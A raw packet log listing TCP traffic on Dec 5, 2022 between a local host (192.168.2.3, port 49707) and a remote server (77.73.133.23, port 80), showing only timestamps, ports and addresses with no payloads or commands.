Dec 5, 2022 01:32:56.954067945 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.954102039 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.954106092 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.954147100 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.954967022 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.955007076 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.955049038 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.955070019 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.955089092 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.955104113 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.955130100 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.955135107 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.955209970 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.956036091 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.956078053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.956118107 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.956151962 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.956176043 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.956918955 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.956986904 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.957005978 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.957029104 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.957035065 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.957070112 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.957081079 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.957113028 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.957114935 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.957154989 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.957159042 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.957196951 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.957200050 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.957242012 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.957628965 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.957669973 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.957710028 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.957725048 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.957751036 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.957762957 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.957794905 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.957801104 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.957835913 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.957839966 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.957882881 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.958766937 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.958867073 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.958940029 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.958947897 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.958982944 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.958991051 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.959023952 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.959032059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.959065914 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.959070921 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.959124088 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.959734917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.959779024 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.959819078 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.959851980 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.959858894 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.959884882 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.959901094 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.959908962 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.959942102 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.959958076 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.959991932 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.960238934 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.960282087 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.960302114 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.960320950 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.960333109 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.960370064 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.960743904 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.960788965 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.960812092 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.960832119 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.960843086 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.960874081 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.960882902 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.960915089 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.960920095 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.960954905 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.960961103 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.961000919 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.961833954 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.961874962 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.961915016 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.961947918 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.961956978 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.961977005 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.961997032 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.962007999 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.962038994 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.962043047 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.962291956 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.962872028 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.962937117 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.962949038 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.962979078 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.962987900 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.963020086 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.963025093 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.963059902 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.963063002 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.963103056 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.963107109 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.963148117 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.963383913 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.963427067 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.963449001 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.963466883 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.963476896 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.963507891 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.963536024 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.963547945 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.963557005 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.963588953 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.963597059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.963629961 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.963665962 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.963687897 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.964447021 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.964488983 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.964518070 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.964529991 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.964540958 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.964572906 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.964601994 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.964615107 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.964617014 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.964654922 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.964658976 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.964696884 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.964699030 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.964750051 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.965447903 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.965514898 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.965543032 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.965584040 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.965624094 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.965636015 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.965668917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.965668917 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.965708971 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.965713978 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.965750933 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.965754032 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.965800047 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.966528893 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.966568947 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.966609955 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.966626883 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.966650009 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.966659069 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.966691971 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.966694117 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.966734886 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.966742992 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.966778994 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.966780901 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.966825962 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.967035055 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.967077971 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.967108965 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.967118025 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.967128038 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.967159033 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.967163086 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.967236996 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.968151093 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968192101 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968200922 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.968234062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.968235016 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968276024 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968298912 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.968316078 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968332052 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.968357086 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968368053 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.968399048 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.968400955 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968647003 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968688011 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968704939 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.968728065 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968736887 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.968771935 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968777895 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.968812943 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968888044 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968894005 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.968929052 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968931913 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.968969107 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.968974113 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.969012976 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.969667912 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.969708920 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.969724894 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.969748974 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.969762087 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.969793081 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.969801903 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.969832897 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.969836950 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.969873905 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.969880104 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.969916105 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.969932079 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.969954967 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.969960928 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.970012903 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.970767975 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.970813036 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.970851898 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.970866919 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.970901966 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.970915079 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.970956087 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.970964909 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.970997095 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.971000910 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.971039057 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.971043110 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.971082926 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.971227884 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.971276045 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.971740007 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.971785069 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.971795082 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.971826077 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.971828938 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.971867085 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.971873045 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.971916914 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.971941948 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.971982002 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.971987963 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.972024918 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.972028017 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.972069025 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.972871065 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.972913980 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.972954035 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.972966909 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.972978115 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.972994089 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.973001957 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.973036051 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.973042011 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.973077059 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.973078012 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.973119020 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.973130941 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.973161936 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.973164082 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.973210096 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.973321915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.973364115 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.973381996 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.973406076 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.973429918 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.973448038 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.973459959 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.974384069 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.974448919 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.974451065 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.974489927 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.974504948 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.974529982 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.974545002 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.974570990 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.974581003 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.974612951 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.974616051 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.974663019 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.974666119 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.974697113 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.974709988 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.974724054 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.974740028 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.974769115 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.974896908 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.974926949 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.974955082 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.974956036 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.974968910 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.974984884 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.975013971 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.975037098 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.975472927 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.975514889 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.975528002 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.975558996 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.975559950 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.975600004 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.975609064 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.975641012 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.975641966 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.975697041 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.975915909 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.975933075 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.975963116 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.975981951 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.975990057 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.976006031 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.976017952 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.976031065 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.976047039 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.976062059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.976074934 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.976090908 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.976103067 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.976115942 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.976145983 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.976196051 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.976304054 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.976505995 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.976535082 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.976556063 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.976572037 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.976620913 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.977021933 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.977063894 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.977103949 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.977103949 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.977130890 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.977147102 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.977165937 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.977188110 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.977214098 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.977230072 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.977233887 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.977272987 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.977304935 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.977324963 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.977359056 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.977400064 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.977438927 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.977441072 CET	49707	80	192.168.2.3	77.73.133.23
